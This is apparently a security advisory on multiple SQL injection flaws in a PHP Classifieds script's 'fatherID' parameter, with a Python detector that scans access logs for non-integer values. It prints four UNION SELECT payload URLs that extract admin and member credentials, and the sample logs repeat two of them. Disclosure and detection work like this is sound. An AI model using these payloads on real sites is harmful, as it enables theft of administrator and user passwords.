PHP Classifieds Script 'fatherID' Parameter Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/browse.php?fatherID=-7+union+select+0,1,2,3,4,5,6,7,8,concat(username,0x3a,password),10+from+admin/*
http://www.example.com/search.php?fatherID=-9999999+union+select+0,concat(username,0x3a,password),2,3,4,5,6,7,8,9,10+from+admin/*
http://www.example.com/browse.php?fatherID=-9999999+union%20select+0,1,2,3,4,5,6,7,8,concat(email,0x3a,password),10+from+members/*
http://www.example.com/search.php?fatherID=-9999999+union+select+0,concat(email,0x3a,password),2,3,4,5,6,7,8,9,10+from+members/*
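
A detection check for requests like the ones above, as an added example that is not part of the original advisory: it scans web access log lines for requests to browse.php or search.php whose decoded fatherID is not a plain integer. The combined log format, the assumption that a legitimate fatherID is a non-negative integer, the function name and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameter named in the advisory.
AFFECTED_SCRIPTS = {"browse.php", "search.php"}
PARAM = "fatherID"

# Client address and request target of a combined-format log entry (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate fatherID is a plain non-negative integer.
VALID_ID_RE = re.compile(r"\d{1,10}")


def suspicious_father_ids(log_lines):
    """Return (client, script, decoded_value) for each request to an affected
    script whose fatherID is not a plain integer."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        script = url.path.rsplit("/", 1)[-1]
        if script not in AFFECTED_SCRIPTS:
            continue
        # parse_qs decodes %XX escapes and turns '+' into a space, so the
        # '+' and '%20' spellings of the same request compare equal.
        values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
        for value in values:
            if not VALID_ID_RE.fullmatch(value):
                hits.append((client, script, value))
    return hits


# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /browse.php?fatherID=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2008:10:00:05 +0000] "GET /browse.php?fatherID=-9999999+union%20select+0,1,2,3,4,5,6,7,8,concat(email,0x3a,password),10+from+members/* HTTP/1.1" 200 4810',
    '203.0.113.7 - - [01/Jan/2008:10:00:09 +0000] "GET /search.php?fatherID=-9999999+union+select+0,concat(username,0x3a,password),2,3,4,5,6,7,8,9,10+from+admin/* HTTP/1.1" 200 4733',
    '192.0.2.10 - - [01/Jan/2008:10:01:00 +0000] "GET /index.php?fatherID=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, script, value in suspicious_father_ids(SAMPLE_LOG):
        print(f"{client} {script} fatherID={value!r}")
```

Parameters sent in a POST body do not appear in the access log, so this check only covers values passed in the query string.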







 

Copyright 2008, SecurityFocus